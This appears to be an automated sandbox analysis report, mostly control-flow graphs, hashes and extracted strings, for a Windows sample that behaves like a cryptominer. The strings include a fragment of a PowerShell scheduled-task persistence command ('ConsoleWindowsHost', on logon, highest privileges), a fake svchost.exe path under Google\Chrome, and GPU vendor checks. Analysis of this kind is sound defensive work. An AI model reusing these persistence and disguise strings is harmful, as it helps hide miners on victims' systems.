                                    • Associated: 00000039.00000002.2918343847.00007FF6D68BA000.00000004.00000001.01000000.00000000.sdmpDownload File
                                    • Associated: 00000039.00000002.2918392070.00007FF6D68BC000.00000002.00000001.01000000.00000000.sdmpDownload File
                                    • Associated: 00000039.00000002.2918441392.00007FF6D68C3000.00000004.00000001.01000000.00000000.sdmpDownload File
                                    • Associated: 00000039.00000002.2918441392.00007FF6D68C5000.00000004.00000001.01000000.00000000.sdmpDownload File
                                    • Associated: 00000039.00000002.2918537302.00007FF6D68C8000.00000002.00000001.01000000.00000000.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_57_2_7ff6d68a0000_conhost.jbxd
                                    Similarity
                                    • API ID: memset$memcpy$_wcsicmpwcslen
                                    • String ID: %S /run /tn "ConsoleWindowsHost"$%S <#lygkxs#> IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest $0$5RK\E$APPDATA=$APPDATA=$SYSTEMROOT=$\BaseNamedObjects\wqhuxjyrrhclgfix$\BaseNamedObjects\xmekvswlr$\BaseNamedObjects\xmekvswlr$\Google\Chrome\svchost.exe$\Google\Libs\$\Registry\Machine\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\ConsoleWindowsHost$\System32$\WindowsPowerShell\v1.0\powershell.exe$\cmd.exe$\reg.exe$\schtasks.exe$e; }$eth$xmr
                                    • API String ID: 1321921031-3228284830
                                    • Opcode ID: ed9d48e6f222f99e7f75c99446f07b154cff4483767d1b2dd1d8d1b0cf796335
                                    • Instruction ID: 4ea9b3248b666a645d8e0f7846f8cf5080e07629235d0b14ac583494122bc071
                                    • Opcode Fuzzy Hash: ed9d48e6f222f99e7f75c99446f07b154cff4483767d1b2dd1d8d1b0cf796335
                                    • Instruction Fuzzy Hash: 0FD27361C1C6C296F7225B2DE4426FD67A0BF92380F455333DD8D926A2DF2FA166C324

                                    Control-flow Graph

                                    • Executed
                                    • Not Executed
                                    control_flow_graph 225 7ff6d68a1180-7ff6d68a11ae 226 7ff6d68a1450-7ff6d68a1453 GetStartupInfoA 225->226 227 7ff6d68a11b4-7ff6d68a11d1 225->227 231 7ff6d68a1460-7ff6d68a147a call 7ff6d68b65f0 226->231 228 7ff6d68a11e4-7ff6d68a11ef 227->228 229 7ff6d68a11f1-7ff6d68a11ff 228->229 230 7ff6d68a11d3-7ff6d68a11d6 228->230 232 7ff6d68a1205-7ff6d68a1209 229->232 233 7ff6d68a1407-7ff6d68a1416 call 7ff6d68b65e8 229->233 235 7ff6d68a13f0-7ff6d68a1401 230->235 236 7ff6d68a11dc-7ff6d68a11e1 Sleep 230->236 237 7ff6d68a120f-7ff6d68a121e 232->237 238 7ff6d68a1480-7ff6d68a1499 call 7ff6d68b6600 232->238 242 7ff6d68a1224-7ff6d68a1226 233->242 243 7ff6d68a141c-7ff6d68a1437 _initterm 233->243 235->232 235->233 236->228 237->242 237->243 251 7ff6d68a149e-7ff6d68a14a6 call 7ff6d68b6630 238->251 245 7ff6d68a143d-7ff6d68a1442 242->245 246 7ff6d68a122c-7ff6d68a1239 242->246 243->245 243->246 245->246 248 7ff6d68a1247-7ff6d68a128f call 7ff6d68ad7b0 SetUnhandledExceptionFilter call 7ff6d68b6070 call 7ff6d68ad530 call 7ff6d68b6050 246->248 249 7ff6d68a123b-7ff6d68a1243 246->249 261 7ff6d68a1291 248->261 262 7ff6d68a12a5-7ff6d68a12ab 248->262 249->248 263 7ff6d68a12e7-7ff6d68a12ed 261->263 264 7ff6d68a1293-7ff6d68a1295 262->264 265 7ff6d68a12ad-7ff6d68a12bb 262->265 269 7ff6d68a13d0-7ff6d68a13da 263->269 270 7ff6d68a12f3-7ff6d68a1318 malloc 263->270 266 7ff6d68a12c0-7ff6d68a12c2 264->266 267 7ff6d68a1297-7ff6d68a129a 264->267 268 7ff6d68a12a1 265->268 272 7ff6d68a12d5-7ff6d68a12de 266->272 273 7ff6d68a12c4 266->273 267->266 271 7ff6d68a129c 267->271 268->262 274 7ff6d68a13e1-7ff6d68a13e7 269->274 275 7ff6d68a13dc 269->275 276 7ff6d68a131a-7ff6d68a1320 270->276 277 7ff6d68a135c-7ff6d68a1390 call 7ff6d68ad340 call 7ff6d68b85c0 270->277 271->268 280 7ff6d68a12e0 272->280 281 7ff6d68a12d0-7ff6d68a12d3 272->281 273->280 274->270 275->274 278 7ff6d68a1325-7ff6d68a1355 strlen malloc memcpy 276->278 286 7ff6d68a1395-7ff6d68a13a3 277->286 282 7ff6d68a1322 278->282 283 7ff6d68a1357 278->283 280->263 281->272 281->280 282->278 283->277 286->251 287 7ff6d68a13a9-7ff6d68a13b1 286->287 287->231 288 7ff6d68a13b7-7ff6d68a13c6 287->288
                                    APIs
                                    Memory Dump Source
                                    • Source File: 00000039.00000002.2918288244.00007FF6D68A1000.00000020.00000001.01000000.00000000.sdmp, Offset: 00007FF6D68A0000, based on PE: true
                                    • Associated: 00000039.00000002.2918207984.00007FF6D68A0000.00000002.00000001.01000000.00000000.sdmpDownload File
                                    • Associated: 00000039.00000002.2918343847.00007FF6D68BA000.00000004.00000001.01000000.00000000.sdmpDownload File
                                    • Associated: 00000039.00000002.2918392070.00007FF6D68BC000.00000002.00000001.01000000.00000000.sdmpDownload File
                                    • Associated: 00000039.00000002.2918441392.00007FF6D68C3000.00000004.00000001.01000000.00000000.sdmpDownload File
                                    • Associated: 00000039.00000002.2918441392.00007FF6D68C5000.00000004.00000001.01000000.00000000.sdmpDownload File
                                    • Associated: 00000039.00000002.2918537302.00007FF6D68C8000.00000002.00000001.01000000.00000000.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_57_2_7ff6d68a0000_conhost.jbxd
                                    Similarity
                                    • API ID: malloc$ExceptionFilterInfoSleepStartupUnhandledmemcpystrlen
                                    • String ID:
                                    • API String ID: 649803965-0
                                    • Opcode ID: 71b5c81f43e52fd828f1680ead49c0dbef4bd44f10060a1c5c891d567f8a8ae7
                                    • Instruction ID: 42a3f36845b6865dceea06ae144689fb64347cec80781a5fceba65677220fc35
                                    • Opcode Fuzzy Hash: 71b5c81f43e52fd828f1680ead49c0dbef4bd44f10060a1c5c891d567f8a8ae7
                                    • Instruction Fuzzy Hash: CA814876E0964685FB609F59E450BBD33A1AF49B85F444037DE8EC33D2DE2EE8658320

                                    Control-flow Graph

                                    • Executed
                                    • Not Executed
                                    control_flow_graph 171 7ff6d68a1720-7ff6d68a1796 172 7ff6d68a17d5-7ff6d68a17e7 call 7ff6d68a40c3 171->172 175 7ff6d68a17a0-7ff6d68a17cd call 7ff6d68a4027 172->175 176 7ff6d68a17e9-7ff6d68a17eb 172->176 175->172 178 7ff6d68a17f1-7ff6d68a1824 176->178 179 7ff6d68a1e30-7ff6d68a1e3d 176->179 181 7ff6d68a1850-7ff6d68a185e 178->181 182 7ff6d68a1e50-7ff6d68a1e70 wcslen 179->182 183 7ff6d68a1830-7ff6d68a1835 181->183 184 7ff6d68a1860-7ff6d68a1867 181->184 191 7ff6d68a1e80 182->191 185 7ff6d68a1990-7ff6d68a19b1 call 7ff6d68a4042 183->185 186 7ff6d68a183b-7ff6d68a184a 183->186 187 7ff6d68a18a6-7ff6d68a18ad 184->187 188 7ff6d68a1869-7ff6d68a18a1 call 7ff6d68a14f0 184->188 185->191 197 7ff6d68a19b7-7ff6d68a1a1a call 7ff6d68a4078 call 7ff6d68a3c50 memset 185->197 186->181 186->185 189 7ff6d68a18af-7ff6d68a1904 187->189 190 7ff6d68a190c-7ff6d68a1924 wcsncmp 187->190 188->187 189->190 190->183 194 7ff6d68a192a-7ff6d68a1988 call 7ff6d68a405d 190->194 194->183 200 7ff6d68a198e 194->200 204 7ff6d68a1a51-7ff6d68a1a58 197->204 205 7ff6d68a1a1c-7ff6d68a1a4c call 7ff6d68a14f0 197->205 200->185 207 7ff6d68a1a9f-7ff6d68a1acc wcscpy wcscat wcslen 204->207 208 7ff6d68a1a5a-7ff6d68a1a97 204->208 205->204 209 7ff6d68a1ad2-7ff6d68a1af0 wcslen 207->209 210 7ff6d68a1e08-7ff6d68a1e1a 207->210 208->207 211 7ff6d68a1e20-7ff6d68a1e2b 209->211 212 7ff6d68a1af6-7ff6d68a1b02 wcslen 209->212 210->211 210->212 213 7ff6d68a1b07-7ff6d68a1b28 211->213 212->213 213->182 214 7ff6d68a1b2e-7ff6d68a1e00 wcslen * 2 call 7ff6d68a4027 * 2 call 7ff6d68a4069 call 7ff6d68a4042 * 2 213->214
                                    APIs
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000039.00000002.2918288244.00007FF6D68A1000.00000020.00000001.01000000.00000000.sdmp, Offset: 00007FF6D68A0000, based on PE: true
                                    • Associated: 00000039.00000002.2918207984.00007FF6D68A0000.00000002.00000001.01000000.00000000.sdmpDownload File
                                    • Associated: 00000039.00000002.2918343847.00007FF6D68BA000.00000004.00000001.01000000.00000000.sdmpDownload File
                                    • Associated: 00000039.00000002.2918392070.00007FF6D68BC000.00000002.00000001.01000000.00000000.sdmpDownload File
                                    • Associated: 00000039.00000002.2918441392.00007FF6D68C3000.00000004.00000001.01000000.00000000.sdmpDownload File
                                    • Associated: 00000039.00000002.2918441392.00007FF6D68C5000.00000004.00000001.01000000.00000000.sdmpDownload File
                                    • Associated: 00000039.00000002.2918537302.00007FF6D68C8000.00000002.00000001.01000000.00000000.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_57_2_7ff6d68a0000_conhost.jbxd
                                    Similarity
                                    • API ID: memsetwcsncmp
                                    • String ID: %S /run /tn "ConsoleWindowsHost"$%S <#lygkxs#> IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest $0$X$\??\$`$explorer.exe$xmr
                                    • API String ID: 1181335886-3936947282
                                    • Opcode ID: 72e7b944cda356ccab0f4163c564e30ce8a089a17b306c5e72144ca181880bd9
                                    • Instruction ID: b1942fa6190c10a8edb5dfba1e036ecaf330a2400478eb5a73554de3f6e5196f
                                    • Opcode Fuzzy Hash: 72e7b944cda356ccab0f4163c564e30ce8a089a17b306c5e72144ca181880bd9
                                    • Instruction Fuzzy Hash: 5C027D22D18BC186E7218B29E4007AE77A0FB857A4F005336DEAD97AD5DF3ED195CB10

                                    Control-flow Graph

                                    APIs
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000039.00000002.2918288244.00007FF6D68A1000.00000020.00000001.01000000.00000000.sdmp, Offset: 00007FF6D68A0000, based on PE: true
                                    • Associated: 00000039.00000002.2918207984.00007FF6D68A0000.00000002.00000001.01000000.00000000.sdmpDownload File
                                    • Associated: 00000039.00000002.2918343847.00007FF6D68BA000.00000004.00000001.01000000.00000000.sdmpDownload File
                                    • Associated: 00000039.00000002.2918392070.00007FF6D68BC000.00000002.00000001.01000000.00000000.sdmpDownload File
                                    • Associated: 00000039.00000002.2918441392.00007FF6D68C3000.00000004.00000001.01000000.00000000.sdmpDownload File
                                    • Associated: 00000039.00000002.2918441392.00007FF6D68C5000.00000004.00000001.01000000.00000000.sdmpDownload File
                                    • Associated: 00000039.00000002.2918537302.00007FF6D68C8000.00000002.00000001.01000000.00000000.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_57_2_7ff6d68a0000_conhost.jbxd
                                    Similarity
                                    • API ID: memsetwcsncmp
                                    • String ID: \BaseNamedObjects\wqhuxjyrrhclgfix$eth
                                    • API String ID: 1181335886-1748801357
                                    • Opcode ID: 3cec96f5b6fe9c1e0d718cdb522f5301e988878a6b55233e939217597fee7acf
                                    • Instruction ID: 414be25596003d1422b336bc24d1521ff4e2e5f63825e1d0d8863e5faf793ad6
                                    • Opcode Fuzzy Hash: 3cec96f5b6fe9c1e0d718cdb522f5301e988878a6b55233e939217597fee7acf
                                    • Instruction Fuzzy Hash: 1401E522F1864141E330D616E800BEEA661AB86BD0F544236FECD53BD9DE7DE156C714

                                    Control-flow Graph

                                    APIs
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000039.00000002.2918288244.00007FF6D68A1000.00000020.00000001.01000000.00000000.sdmp, Offset: 00007FF6D68A0000, based on PE: true
                                    • Associated: 00000039.00000002.2918207984.00007FF6D68A0000.00000002.00000001.01000000.00000000.sdmpDownload File
                                    • Associated: 00000039.00000002.2918343847.00007FF6D68BA000.00000004.00000001.01000000.00000000.sdmpDownload File
                                    • Associated: 00000039.00000002.2918392070.00007FF6D68BC000.00000002.00000001.01000000.00000000.sdmpDownload File
                                    • Associated: 00000039.00000002.2918441392.00007FF6D68C3000.00000004.00000001.01000000.00000000.sdmpDownload File
                                    • Associated: 00000039.00000002.2918441392.00007FF6D68C5000.00000004.00000001.01000000.00000000.sdmpDownload File
                                    • Associated: 00000039.00000002.2918537302.00007FF6D68C8000.00000002.00000001.01000000.00000000.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_57_2_7ff6d68a0000_conhost.jbxd
                                    Similarity
                                    • API ID: wcslen
                                    • String ID: 0$eth
                                    • API String ID: 4088430540-242559905
                                    • Opcode ID: f74c1e0205a4425754c71729f2568980e9605874d7e0dc2ad41c45750a7f0511
                                    • Instruction ID: daa69238bc4c7f308db12ce6e0b2e8d180911d8839a7af3181fd83222787979f
                                    • Opcode Fuzzy Hash: f74c1e0205a4425754c71729f2568980e9605874d7e0dc2ad41c45750a7f0511
                                    • Instruction Fuzzy Hash: CE01D222A1869086E7208B54F85079FB770EFC4368F640336FB9C86AD5EF7EC5918B40
                                    Memory Dump Source
                                    • Source File: 00000039.00000002.2918288244.00007FF6D68A1000.00000020.00000001.01000000.00000000.sdmp, Offset: 00007FF6D68A0000, based on PE: true
                                    • Associated: 00000039.00000002.2918207984.00007FF6D68A0000.00000002.00000001.01000000.00000000.sdmpDownload File
                                    • Associated: 00000039.00000002.2918343847.00007FF6D68BA000.00000004.00000001.01000000.00000000.sdmpDownload File
                                    • Associated: 00000039.00000002.2918392070.00007FF6D68BC000.00000002.00000001.01000000.00000000.sdmpDownload File
                                    • Associated: 00000039.00000002.2918441392.00007FF6D68C3000.00000004.00000001.01000000.00000000.sdmpDownload File
                                    • Associated: 00000039.00000002.2918441392.00007FF6D68C5000.00000004.00000001.01000000.00000000.sdmpDownload File
                                    • Associated: 00000039.00000002.2918537302.00007FF6D68C8000.00000002.00000001.01000000.00000000.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_57_2_7ff6d68a0000_conhost.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: 3d3a6bd0b90a72bb3ebf491c3b8390b68c216c5f6876ae65ed73438912ba1751
                                    • Instruction ID: a6e2dafec08ad7f273b8a33d085be2baebe1567b7249d1a6b532c71aec194a21
                                    • Opcode Fuzzy Hash: 3d3a6bd0b90a72bb3ebf491c3b8390b68c216c5f6876ae65ed73438912ba1751
                                    • Instruction Fuzzy Hash: 0DE0B676A08B84918614DB52F48045EBB64F7D97C4B504916FECC53B19CF3CC1A08B50

                                    Control-flow Graph

                                    • Executed
                                    • Not Executed
                                    control_flow_graph 352 7ff6d68a1ea0-7ff6d68a1f16 call 7ff6d68b6680 355 7ff6d68a1f43-7ff6d68a1f4a 352->355 356 7ff6d68a1f18-7ff6d68a1f3e memcpy call 7ff6d68a14f0 352->356 358 7ff6d68a1f50-7ff6d68a2086 355->358 359 7ff6d68a208d-7ff6d68a20bb wcslen memcpy 355->359 356->355 358->359 360 7ff6d68a20e8-7ff6d68a20ef 359->360 361 7ff6d68a20bd-7ff6d68a20e3 memcpy call 7ff6d68a14f0 359->361 363 7ff6d68a2232-7ff6d68a2278 360->363 364 7ff6d68a20f5-7ff6d68a222b 360->364 361->360 365 7ff6d68a22cf-7ff6d68a22d6 363->365 366 7ff6d68a227a-7ff6d68a22ca call 7ff6d68a14f0 363->366 364->363 368 7ff6d68a22d8-7ff6d68a2334 365->368 369 7ff6d68a233c-7ff6d68a2375 wcslen 365->369 366->365 368->369 370 7ff6d68a2377-7ff6d68a23c5 call 7ff6d68a14f0 369->370 371 7ff6d68a23ca-7ff6d68a23d1 369->371 370->371 373 7ff6d68a23d3-7ff6d68a242f 371->373 374 7ff6d68a2437-7ff6d68a24a3 call 7ff6d68a40ed 371->374 373->374 377 7ff6d68a2929 374->377 378 7ff6d68a24a9-7ff6d68a24ea 374->378 379 7ff6d68a292b-7ff6d68a2969 377->379 380 7ff6d68a24f3-7ff6d68a2517 call 7ff6d68a40f9 378->380 383 7ff6d68a291f-7ff6d68a2924 call 7ff6d68a3fdc 380->383 384 7ff6d68a251d-7ff6d68a2589 call 7ff6d68a40ed 380->384 383->377 388 7ff6d68a258f-7ff6d68a25b6 call 7ff6d68a4114 384->388 389 7ff6d68a24f0 384->389 392 7ff6d68a2910-7ff6d68a291a call 7ff6d68a3fdc 388->392 393 7ff6d68a25bc-7ff6d68a25ce 388->393 389->380 392->389 394 7ff6d68a2610-7ff6d68a2617 393->394 395 7ff6d68a25d0-7ff6d68a260b call 7ff6d68a14f0 393->395 398 7ff6d68a2686-7ff6d68a269d _wcsnicmp 394->398 399 7ff6d68a2619-7ff6d68a267e 394->399 395->394 401 7ff6d68a26a3-7ff6d68a26aa 398->401 402 7ff6d68a296a-7ff6d68a2983 call 7ff6d68a3fdc * 2 398->402 399->398 404 7ff6d68a26d4-7ff6d68a26db 401->404 405 7ff6d68a26ac-7ff6d68a26cf call 7ff6d68a14f0 401->405 402->379 408 7ff6d68a26dd-7ff6d68a2704 404->408 409 7ff6d68a270c-7ff6d68a2723 _wcsnicmp 404->409 405->404 408->409 409->402 411 7ff6d68a2729-7ff6d68a2730 409->411 413 7ff6d68a2732-7ff6d68a2755 call 7ff6d68a14f0 411->413 414 7ff6d68a275a-7ff6d68a2761 411->414 413->414 416 7ff6d68a2763-7ff6d68a278a 414->416 417 7ff6d68a2792-7ff6d68a27a9 _wcsnicmp 414->417 416->417 417->402 418 7ff6d68a27af-7ff6d68a27e4 417->418 419 7ff6d68a2854-7ff6d68a285b 418->419 420 7ff6d68a27e6-7ff6d68a284f call 7ff6d68a14f0 418->420 422 7ff6d68a2861-7ff6d68a28f4 419->422 423 7ff6d68a28fc-7ff6d68a290e wcsstr 419->423 420->419 422->423 423->392 423->402
                                    APIs
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000039.00000002.2918288244.00007FF6D68A1000.00000020.00000001.01000000.00000000.sdmp, Offset: 00007FF6D68A0000, based on PE: true
                                    • Associated: 00000039.00000002.2918207984.00007FF6D68A0000.00000002.00000001.01000000.00000000.sdmpDownload File
                                    • Associated: 00000039.00000002.2918343847.00007FF6D68BA000.00000004.00000001.01000000.00000000.sdmpDownload File
                                    • Associated: 00000039.00000002.2918392070.00007FF6D68BC000.00000002.00000001.01000000.00000000.sdmpDownload File
                                    • Associated: 00000039.00000002.2918441392.00007FF6D68C3000.00000004.00000001.01000000.00000000.sdmpDownload File
                                    • Associated: 00000039.00000002.2918441392.00007FF6D68C5000.00000004.00000001.01000000.00000000.sdmpDownload File
                                    • Associated: 00000039.00000002.2918537302.00007FF6D68C8000.00000002.00000001.01000000.00000000.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_57_2_7ff6d68a0000_conhost.jbxd
                                    Similarity
                                    • API ID: memcpy$wcslen
                                    • String ID: $0'$0$@$AMD$APPDATA=$ATI$Advanced Micro Devices$NVIDIA$ProviderName$ProviderName$\Registry\Machine\SYSTEM\CurrentControlSet\Control\Class\{4d36e968-e325-11ce-bfc1-08002be10318}\$\Registry\Machine\SYSTEM\CurrentControlSet\Control\Class\{4d36e968-e325-11ce-bfc1-08002be10318}\
                                    • API String ID: 1844840824-1300809496
                                    • Opcode ID: e3c32df8036ee57604a361df138a59f6e45f3ff775bb6656f43f7e262d54461d
                                    • Instruction ID: efec8a268dbc02ea893790acc34cccf91054530726e250c3fd7a44aab5cc5ec8
                                    • Opcode Fuzzy Hash: e3c32df8036ee57604a361df138a59f6e45f3ff775bb6656f43f7e262d54461d
                                    • Instruction Fuzzy Hash: 3E526420D2CAC256FB12DB29E4517FDA360BF91384F055333D98DA16A1EF2FA166C724

                                    Control-flow Graph

                                    • Executed
                                    • Not Executed
                                    control_flow_graph 424 7ff6d68aee40-7ff6d68aee55 425 7ff6d68aee90-7ff6d68aee9d malloc 424->425 426 7ff6d68aee57-7ff6d68aee63 malloc 424->426 428 7ff6d68aeed2-7ff6d68aef11 abort CreateSemaphoreW TlsAlloc 425->428 429 7ff6d68aee9f-7ff6d68aeeb8 425->429 427 7ff6d68aee65-7ff6d68aee76 426->427 426->428 431 7ff6d68aee78-7ff6d68aee8d memcpy 427->431 432 7ff6d68aeeba-7ff6d68aeed1 memset 427->432 433 7ff6d68aef30-7ff6d68aef36 GetLastError 428->433 434 7ff6d68aef13-7ff6d68aef22 call 7ff6d68b67e0 428->434 429->431 429->432 436 7ff6d68aef27-7ff6d68aef29 433->436 434->436 437 7ff6d68aef38-7ff6d68aef5c abort 436->437 438 7ff6d68aef2b-7ff6d68aef2f 436->438 439 7ff6d68aef5e-7ff6d68aef65 437->439 440 7ff6d68aef78-7ff6d68aef7f 437->440 441 7ff6d68aefe0-7ff6d68aefe9 call 7ff6d68aee40 439->441 442 7ff6d68aef67-7ff6d68aef73 439->442 443 7ff6d68aeff0-7ff6d68aeff6 440->443 444 7ff6d68aef81-7ff6d68aefa9 GetLastError TlsGetValue SetLastError 440->444 441->442 446 7ff6d68aeffc-7ff6d68af006 443->446 447 7ff6d68af10a-7ff6d68af111 443->447 448 7ff6d68af060-7ff6d68af07a calloc 444->448 449 7ff6d68aefaf-7ff6d68aefb5 444->449 451 7ff6d68af138-7ff6d68af140 446->451 452 7ff6d68af00c-7ff6d68af014 446->452 447->444 453 7ff6d68af117-7ff6d68af12d 447->453 454 7ff6d68af080 448->454 455 7ff6d68af193-7ff6d68af1a3 abort 448->455 456 7ff6d68af0a8-7ff6d68af0cf realloc 449->456 457 7ff6d68aefbb-7ff6d68aefc7 449->457 460 7ff6d68af0f1-7ff6d68af0f6 call 7ff6d68aeee0 451->460 461 7ff6d68af142-7ff6d68af15a 451->461 458 7ff6d68af16c-7ff6d68af180 WaitForSingleObject 452->458 459 7ff6d68af01a-7ff6d68af021 452->459 462 7ff6d68af083-7ff6d68af094 TlsSetValue 454->462 464 7ff6d68af1b0-7ff6d68af1b4 455->464 465 7ff6d68af1a5-7ff6d68af1a8 455->465 456->455 466 7ff6d68af0d5-7ff6d68af0ef memset 456->466 457->442 463 7ff6d68aefc9-7ff6d68aefd6 call 7ff6d68aee40 457->463 458->459 473 7ff6d68af186-7ff6d68af18e 458->473 459->453 470 7ff6d68af027-7ff6d68af02b 459->470 471 7ff6d68af100-7ff6d68af104 460->471 461->471 472 7ff6d68af15c 461->472 462->457 474 7ff6d68af09a-7ff6d68af09d GetLastError 462->474 463->442 467 7ff6d68af1b6 464->467 468 7ff6d68af1ba-7ff6d68af1bd 464->468 465->464 466->462 467->468 476 7ff6d68af1bf-7ff6d68af1c2 468->476 477 7ff6d68af1c4 468->477 470->444 479 7ff6d68af031-7ff6d68af039 470->479 471->447 471->452 480 7ff6d68af160-7ff6d68af168 Sleep 472->480 473->459 474->457 476->477 482 7ff6d68af1c8-7ff6d68af1cc 476->482 479->444 483 7ff6d68af03f-7ff6d68af054 ReleaseSemaphore 479->483 480->480 484 7ff6d68af16a 480->484 483->444 484->471
                                    APIs
                                    Memory Dump Source
                                    • Source File: 00000039.00000002.2918288244.00007FF6D68A1000.00000020.00000001.01000000.00000000.sdmp, Offset: 00007FF6D68A0000, based on PE: true
                                    • Associated: 00000039.00000002.2918207984.00007FF6D68A0000.00000002.00000001.01000000.00000000.sdmpDownload File
                                    • Associated: 00000039.00000002.2918343847.00007FF6D68BA000.00000004.00000001.01000000.00000000.sdmpDownload File
                                    • Associated: 00000039.00000002.2918392070.00007FF6D68BC000.00000002.00000001.01000000.00000000.sdmpDownload File
                                    • Associated: 00000039.00000002.2918441392.00007FF6D68C3000.00000004.00000001.01000000.00000000.sdmpDownload File
                                    • Associated: 00000039.00000002.2918441392.00007FF6D68C5000.00000004.00000001.01000000.00000000.sdmpDownload File
                                    • Associated: 00000039.00000002.2918537302.00007FF6D68C8000.00000002.00000001.01000000.00000000.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_57_2_7ff6d68a0000_conhost.jbxd
                                    Similarity
                                    • API ID: abortmalloc$AllocCreateErrorLastSemaphorememcpymemset
                                    • String ID:
                                    • API String ID: 342303811-0
                                    • Opcode ID: 85fac38ae522e21316106aed78488c672620c796fbf0e98209ea9b4b241157f7
                                    • Instruction ID: 71b9d3b1db0b676ee188711e86c3cf1b31ef00ecfe15386cbff52fd4a115fb10
                                    • Opcode Fuzzy Hash: 85fac38ae522e21316106aed78488c672620c796fbf0e98209ea9b4b241157f7
                                    • Instruction Fuzzy Hash: 38919E32E0970281EB559F29E804A7D32A1AF44B84F58853BDD1E877D0DF7EE862D360

                                    Control-flow Graph

                                    APIs
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000039.00000002.2918288244.00007FF6D68A1000.00000020.00000001.01000000.00000000.sdmp, Offset: 00007FF6D68A0000, based on PE: true
                                    • Associated: 00000039.00000002.2918207984.00007FF6D68A0000.00000002.00000001.01000000.00000000.sdmpDownload File
                                    • Associated: 00000039.00000002.2918343847.00007FF6D68BA000.00000004.00000001.01000000.00000000.sdmpDownload File
                                    • Associated: 00000039.00000002.2918392070.00007FF6D68BC000.00000002.00000001.01000000.00000000.sdmpDownload File
                                    • Associated: 00000039.00000002.2918441392.00007FF6D68C3000.00000004.00000001.01000000.00000000.sdmpDownload File
                                    • Associated: 00000039.00000002.2918441392.00007FF6D68C5000.00000004.00000001.01000000.00000000.sdmpDownload File
                                    • Associated: 00000039.00000002.2918537302.00007FF6D68C8000.00000002.00000001.01000000.00000000.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_57_2_7ff6d68a0000_conhost.jbxd
                                    Similarity
                                    • API ID: fwrite$fputs$abortfree$fputcmemcpystrlen
                                    • String ID: what(): $terminate called after throwing an instance of '$terminate called recursively$terminate called without an active exception
                                    • API String ID: 802779101-808685626
                                    • Opcode ID: 7a0d0e86b158a8b2a6229439966cc07d4798ec1896ed5a95fc01cbd5affc896b
                                    • Instruction ID: e39ce96d14230c7fede05d979347a3f631d7e0b95fa6b406abcfd5aa3373955a
                                    • Opcode Fuzzy Hash: 7a0d0e86b158a8b2a6229439966cc07d4798ec1896ed5a95fc01cbd5affc896b
                                    • Instruction Fuzzy Hash: 7141C010F1921745FA14A77AA8297BE26559F86B80F44403BDA0EC77C3DE2FE5618732

                                    Control-flow Graph

                                    APIs
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000039.00000002.2918288244.00007FF6D68A1000.00000020.00000001.01000000.00000000.sdmp, Offset: 00007FF6D68A0000, based on PE: true
                                    • Associated: 00000039.00000002.2918207984.00007FF6D68A0000.00000002.00000001.01000000.00000000.sdmpDownload File
                                    • Associated: 00000039.00000002.2918343847.00007FF6D68BA000.00000004.00000001.01000000.00000000.sdmpDownload File
                                    • Associated: 00000039.00000002.2918392070.00007FF6D68BC000.00000002.00000001.01000000.00000000.sdmpDownload File
                                    • Associated: 00000039.00000002.2918441392.00007FF6D68C3000.00000004.00000001.01000000.00000000.sdmpDownload File
                                    • Associated: 00000039.00000002.2918441392.00007FF6D68C5000.00000004.00000001.01000000.00000000.sdmpDownload File
                                    • Associated: 00000039.00000002.2918537302.00007FF6D68C8000.00000002.00000001.01000000.00000000.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_57_2_7ff6d68a0000_conhost.jbxd
                                    Similarity
                                    • API ID: ExceptionRaiseUnwindabort
                                    • String ID: CCG $CCG!$CCG!$CCG"
                                    • API String ID: 4140830120-3707373406
                                    • Opcode ID: 2aafb9967443909bfa9316e4b939b2f244aac7ef74ad9229c0f94810070b0ad2
                                    • Instruction ID: e07617114b70129f3f6afd303f9dd707a4e5cfda1306e68644367a8f92660e88
                                    • Opcode Fuzzy Hash: 2aafb9967443909bfa9316e4b939b2f244aac7ef74ad9229c0f94810070b0ad2
                                    • Instruction Fuzzy Hash: 8B519F32A08B8182E7608B15E448BAD7370F789B94F545636EF8D53798DF3ED5A1C710

                                    Control-flow Graph

                                    • Executed
                                    • Not Executed
